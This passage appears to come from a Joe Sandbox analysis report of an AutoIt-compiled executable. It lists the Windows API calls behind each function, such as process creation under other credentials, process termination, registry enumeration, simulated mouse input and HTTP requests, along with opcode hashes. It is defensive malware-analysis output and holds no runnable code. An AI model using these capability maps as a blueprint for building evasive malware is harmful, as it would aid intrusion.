                                          • EndPaint.USER32(?,?), ref: 00901876
                                          Similarity
                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                          • String ID:
                                          • API String ID: 1827037458-0
                                          • Opcode ID: e63d8a99504db12b81e58ff4dcee104fb1618f66634fda881797a46e27e98dce
                                          • Instruction ID: e4e780b91386351005ef9c5d989d6c88ddb585be8a1c75d0a7f342a5f34a7a5e
                                          • Opcode Fuzzy Hash: e63d8a99504db12b81e58ff4dcee104fb1618f66634fda881797a46e27e98dce
                                          • Instruction Fuzzy Hash: 76418C31508700AFD710DF24CC94FAA7BE8EB49724F144629FAA58B2F1D730A945EB62
                                          APIs
                                          • ShowWindow.USER32(009C57B0,00000000,01026608,?,?,009C57B0,?,0098B5A8,?,?), ref: 0098B712
                                          • EnableWindow.USER32(00000000,00000000), ref: 0098B736
                                          • ShowWindow.USER32(009C57B0,00000000,01026608,?,?,009C57B0,?,0098B5A8,?,?), ref: 0098B796
                                          • ShowWindow.USER32(00000000,00000004,?,0098B5A8,?,?), ref: 0098B7A8
                                          • EnableWindow.USER32(00000000,00000001), ref: 0098B7CC
                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0098B7EF
                                          Similarity
                                          • API ID: Window$Show$Enable$MessageSend
                                          • String ID:
                                          • API String ID: 642888154-0
                                          • Opcode ID: f6f11bc8cd296c841ff2aaf2d0348b7c093a1081479a3bd226bf1372500a0487
                                          • Instruction ID: c62cf5b3c29990b73695bfa514cd99545c9f944e8f5ce11e93638481e17b881d
                                          • Opcode Fuzzy Hash: f6f11bc8cd296c841ff2aaf2d0348b7c093a1081479a3bd226bf1372500a0487
                                          • Instruction Fuzzy Hash: 50417D34604244AFDB22EF24C499B957BE5FF89310F5C41B9E9488FBA2C731A856CB50
                                          APIs
                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00974E41,?,?,00000000,00000001), ref: 009770AC
                                            • Part of subcall function 009739A0: GetWindowRect.USER32(?,?), ref: 009739B3
                                          • GetDesktopWindow.USER32 ref: 009770D6
                                          • GetWindowRect.USER32(00000000), ref: 009770DD
                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0097710F
                                            • Part of subcall function 00965244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009652BC
                                          • GetCursorPos.USER32(?), ref: 0097713B
                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00977199
                                          Similarity
                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                          • String ID:
                                          • API String ID: 4137160315-0
                                          • Opcode ID: 0f4345d3b564fb10958bad4f705949323efb598fe4bda2017d2b8d7721935d2e
                                          • Instruction ID: 913a4c16156ce33e5a87fb23e98d9f055d7ef21e6f86d630573e1a0f01663ccc
                                          • Opcode Fuzzy Hash: 0f4345d3b564fb10958bad4f705949323efb598fe4bda2017d2b8d7721935d2e
                                          • Instruction Fuzzy Hash: CF31D072609305ABD720DF54D849B9BB7AAFF88314F004929F58997291CB30EA09CB92
                                          APIs
                                            • Part of subcall function 009580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009580C0
                                            • Part of subcall function 009580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009580CA
                                            • Part of subcall function 009580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009580D9
                                            • Part of subcall function 009580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009580E0
                                            • Part of subcall function 009580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009580F6
                                          • GetLengthSid.ADVAPI32(?,00000000,0095842F), ref: 009588CA
                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009588D6
                                          • HeapAlloc.KERNEL32(00000000), ref: 009588DD
                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 009588F6
                                          • GetProcessHeap.KERNEL32(00000000,00000000,0095842F), ref: 0095890A
                                          • HeapFree.KERNEL32(00000000), ref: 00958911
                                          Similarity
                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                          • String ID:
                                          • API String ID: 3008561057-0
                                          • Opcode ID: 192b9832a7b636154bd314d159aa8609dc0dae309e0f8851c77521db914476ad
                                          • Instruction ID: b23492a8f02ef5ab7120fc7c506fad84c1826c1ab67b198dbf97e2d4739c6c9a
                                          • Opcode Fuzzy Hash: 192b9832a7b636154bd314d159aa8609dc0dae309e0f8851c77521db914476ad
                                          • Instruction Fuzzy Hash: 0011AF31525209FFDB10DFA5DC29BBFB76CEB44316F104028E846A7210CB32A918DB60
                                          APIs
                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009585E2
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 009585E9
                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009585F8
                                          • CloseHandle.KERNEL32(00000004), ref: 00958603
                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00958632
                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00958646
                                          Similarity
                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                          • String ID:
                                          • API String ID: 1413079979-0
                                          • Opcode ID: 68f7b7191ca3037a64557d553154ccfdb0de5fc1fc187c1f32897e4a156d3d5b
                                          • Instruction ID: 8f661e91193e70afcce178cd42c5c1107e2fe9f2393c0aab16346a330c2c48ed
                                          • Opcode Fuzzy Hash: 68f7b7191ca3037a64557d553154ccfdb0de5fc1fc187c1f32897e4a156d3d5b
                                          • Instruction Fuzzy Hash: 7911597250520DABDF01CFA5DD49BEF7BA9EF08345F144065FE04A2260C7768E65EB60
                                          APIs
                                          • GetDC.USER32(00000000), ref: 0095B7B5
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0095B7C6
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0095B7CD
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0095B7D5
                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0095B7EC
                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0095B7FE
                                          Similarity
                                          • API ID: CapsDevice$Release
                                          • String ID:
                                          • API String ID: 1035833867-0
                                          APIs
                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00920193
                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 0092019B
                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009201A6
                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009201B1
                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 009201B9
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 009201C1
                                          Similarity
                                          • API ID: Virtual
                                          • String ID:
                                          • API String ID: 4278518827-0
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009653F9
                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0096540F
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0096541E
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0096542D
                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00965437
                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0096543E
                                          Similarity
                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                          • String ID:
                                          • API String ID: 839392675-0
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,?), ref: 00967243
                                          • EnterCriticalSection.KERNEL32(?,?,00910EE4,?,?), ref: 00967254
                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00910EE4,?,?), ref: 00967261
                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00910EE4,?,?), ref: 0096726E
                                            • Part of subcall function 00966C35: CloseHandle.KERNEL32(00000000,?,0096727B,?,00910EE4,?,?), ref: 00966C3F
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00967281
                                          • LeaveCriticalSection.KERNEL32(?,?,00910EE4,?,?), ref: 00967288
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 3495660284-0
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0095899D
                                          • UnloadUserProfile.USERENV(?,?), ref: 009589A9
                                          • CloseHandle.KERNEL32(?), ref: 009589B2
                                          • CloseHandle.KERNEL32(?), ref: 009589BA
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 009589C3
                                          • HeapFree.KERNEL32(00000000), ref: 009589CA
                                          Similarity
                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                          • String ID:
                                          • API String ID: 146765662-0
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00978613
                                          • CharUpperBuffW.USER32(?,?), ref: 00978722
                                          • VariantClear.OLEAUT32(?), ref: 0097889A
                                            • Part of subcall function 00967562: VariantInit.OLEAUT32(00000000), ref: 009675A2
                                            • Part of subcall function 00967562: VariantCopy.OLEAUT32(00000000,?), ref: 009675AB
                                            • Part of subcall function 00967562: VariantClear.OLEAUT32(00000000), ref: 009675B7
                                          Strings
                                          Similarity
                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                          • API String ID: 4237274167-1221869570
                                          APIs
                                            • Part of subcall function 0091FC86: _wcscpy.LIBCMT ref: 0091FCA9
                                          • _memset.LIBCMT ref: 00962B87
                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00962BB6
                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00962C69
                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00962C97
                                          Strings
                                          Similarity
                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                          • String ID: 0
                                          • API String ID: 4152858687-4108050209
                                          APIs
                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0095D5D4
                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0095D60A
                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0095D61B
                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0095D69D
                                          Strings
                                          Similarity
                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                          • String ID: DllGetClassObject
                                          • API String ID: 753597075-1075368562
                                          APIs
                                          • _memset.LIBCMT ref: 009627C0
                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009627DC
                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00962822
                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009C5890,00000000), ref: 0096286B
                                          Strings
                                          Similarity
                                          • API ID: Menu$Delete$InfoItem_memset
                                          • String ID: 0
                                          • API String ID: 1173514356-4108050209
                                          APIs
                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0097D7C5
                                            • Part of subcall function 0090784B: _memmove.LIBCMT ref: 00907899
                                          Strings
                                          Similarity
                                          • API ID: BuffCharLower_memmove
                                          • String ID: cdecl$none$stdcall$winapi
                                          • API String ID: 3425801089-567219261
                                          APIs
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                            • Part of subcall function 0095AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0095AABC
                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00958F14
                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00958F27
                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00958F57
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$_memmove$ClassName
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 365058703-1403004172
                                          APIs
                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0097184C
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00971872
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009718A2
                                          • InternetCloseHandle.WININET(00000000), ref: 009718E9
                                            • Part of subcall function 00972483: GetLastError.KERNEL32(?,?,00971817,00000000,00000000,00000001), ref: 00972498
                                            • Part of subcall function 00972483: SetEvent.KERNEL32(?,?,00971817,00000000,00000000,00000001), ref: 009724AD
                                          Strings
                                          Similarity
                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                          • String ID:
                                          • API String ID: 3113390036-3916222277
                                          APIs
                                            • Part of subcall function 00901D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00901D73
                                            • Part of subcall function 00901D35: GetStockObject.GDI32(00000011), ref: 00901D87
                                            • Part of subcall function 00901D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00901D91
                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00986461
                                          • LoadLibraryW.KERNEL32(?), ref: 00986468
                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0098647D
                                          • DestroyWindow.USER32(?), ref: 00986485
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                          • String ID: SysAnimate32
                                          • API String ID: 4146253029-1011021900
                                          • Opcode ID: 6dd0f15e12f59f76a04ff6d1541a6ecc4e2f21ba0b1b22c5adac9e081ac06693
                                          • Instruction ID: 96ee51d9040d2db69eea679336417cc85054cdaf56cafad4dceb37df65c3fd82
                                          • Opcode Fuzzy Hash: 6dd0f15e12f59f76a04ff6d1541a6ecc4e2f21ba0b1b22c5adac9e081ac06693
                                          • Instruction Fuzzy Hash: EE215B71210209AFEF106F74DC90EBF77ADEB59368F204629FA109B2A0D7719C91A760
                                          APIs
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00966DBC
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00966DEF
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00966E01
                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00966E3B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: ba1f2b1ba7d50de441cd739d920566e76caf8137a45e3de3f2dc80b22c87e079
                                          • Instruction ID: 9a327e375f68f2ac9b59e134bb9fab3bfbc7512db435c4413525dee599b795cc
                                          • Opcode Fuzzy Hash: ba1f2b1ba7d50de441cd739d920566e76caf8137a45e3de3f2dc80b22c87e079
                                          • Instruction Fuzzy Hash: F621AF75600209ABDB209F29DC55B9A7BFCEF84720F204A29FDA1D72D0DB71A960DB50
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00966E89
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00966EBB
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00966ECC
                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00966F06
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: ed89b58b2a8924d2cbd0073467a2d20f12c1194975605cc67f8d9bfbfe8b3592
                                          • Instruction ID: 01d5b9086948a285028a1ec79b21e1f76b34132c816ea2eb3cc9b3ab25bb15ba
                                          • Opcode Fuzzy Hash: ed89b58b2a8924d2cbd0073467a2d20f12c1194975605cc67f8d9bfbfe8b3592
                                          • Instruction Fuzzy Hash: 5221AF796007059BDB219F69DC44AAA77A8EF85730F200B19FDF1D72D0DB71A860CB50
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0096AC54
                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0096ACA8
                                          • __swprintf.LIBCMT ref: 0096ACC1
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,0098F910), ref: 0096ACFF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ErrorMode$InformationVolume__swprintf
                                          • String ID: %lu
                                          • API String ID: 3164766367-685833217
                                          • Opcode ID: 2fb12a55f8124b789e62f9d286b9f8a54df434e4fd130647557c281adf13b01b
                                          • Instruction ID: d914f9394245eb06a95ed2895d3417d6e73f81bd779a0995d53fddcfb9da875d
                                          • Opcode Fuzzy Hash: 2fb12a55f8124b789e62f9d286b9f8a54df434e4fd130647557c281adf13b01b
                                          • Instruction Fuzzy Hash: 60217430600109AFCB10DF65C945EAE77B8EF89314B004069F905AB352DB35EA41DB21
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00961B19
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                          • API String ID: 3964851224-769500911
                                          • Opcode ID: 8c633baebcc6d2e3811397e500b28f0cc91262c3a37ad11221423191a8bcfdd4
                                          • Instruction ID: f7b4c6e6983d5826ba40118f90f6ee0bd3a07c144dfda7c34efd1441863430bc
                                          • Opcode Fuzzy Hash: 8c633baebcc6d2e3811397e500b28f0cc91262c3a37ad11221423191a8bcfdd4
                                          • Instruction Fuzzy Hash: CD1184309102188FCF10EFA4E9959FFB7B8FFA5304B5444A9E815A7296EB729D06CF50
                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0097EC07
                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0097EC37
                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0097ED6A
                                          • CloseHandle.KERNEL32(?), ref: 0097EDEB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                          • String ID:
                                          • API String ID: 2364364464-0
                                          • Opcode ID: 2af433a5ab4981b21016f87077436676afb101dd5d9f1c4968c0733f3139f7ee
                                          • Instruction ID: 4a968ef64aadc28e8ef877c574d22a4aa76891a84530581826d589ca6a55f659
                                          • Opcode Fuzzy Hash: 2af433a5ab4981b21016f87077436676afb101dd5d9f1c4968c0733f3139f7ee
                                          • Instruction Fuzzy Hash: 8C813DB16047009FD760EF29C886F2AB7E5AF88710F14C95DF9999B3D2DAB0AC41CB51
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                          • String ID:
                                          • API String ID: 1559183368-0
                                          • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                          • Instruction ID: c35e7b7325a98a20f72b7937a118d1685d8b08434bfc1ffe4aca7ab35d8446a7
                                          • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                          • Instruction Fuzzy Hash: 8B51D970A00B25DBCB249F69F880A6EB7BAAF40335F258729F835962D8D774DD508F40
                                          APIs
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                            • Part of subcall function 00980E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0097FDAD,?,?), ref: 00980E31
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009800FD
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0098013C
                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00980183
                                          • RegCloseKey.ADVAPI32(?,?), ref: 009801AF
                                          • RegCloseKey.ADVAPI32(00000000), ref: 009801BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                          • String ID:
                                          • API String ID: 3440857362-0
                                          • Opcode ID: d5eaf18a030c6d5e2de155f8bf9c6cc6875b88877df93af4ded7019571599f7b
                                          • Instruction ID: b6dcdc693ac58044ccc88682ac228ff269b21343406f2fe1e7b458877b7aef22
                                          • Opcode Fuzzy Hash: d5eaf18a030c6d5e2de155f8bf9c6cc6875b88877df93af4ded7019571599f7b
                                          • Instruction Fuzzy Hash: 64516A71208204AFD704EF68C895F6AB7E9FFC4314F40892DF596872A2DB35E949CB52
                                          APIs
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0097D927
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0097D9AA
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0097D9C6
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0097DA07
                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0097DA21
                                            • Part of subcall function 00905A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00967896,?,?,00000000), ref: 00905A2C
                                            • Part of subcall function 00905A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00967896,?,?,00000000,?,?), ref: 00905A50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                          • String ID:
                                          • API String ID: 327935632-0
                                          • Opcode ID: 2bba0b19ab3675ff6c99a3c37938113ee5e977cdd6291e9e60e2be1ba5af5c0a
                                          • Instruction ID: 01db8c4d32118ada55f0f1194a3cda115a06cd8a9bacfe21c1f39d9eb63e31c7
                                          • Opcode Fuzzy Hash: 2bba0b19ab3675ff6c99a3c37938113ee5e977cdd6291e9e60e2be1ba5af5c0a
                                          • Instruction Fuzzy Hash: 50512636A05209DFCB00EFA8C484AADBBB9FF49320B15C065E959AB352D731AD45CF90
                                          APIs
                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0096E61F
                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0096E648
                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0096E687
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0096E6AC
                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0096E6B4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
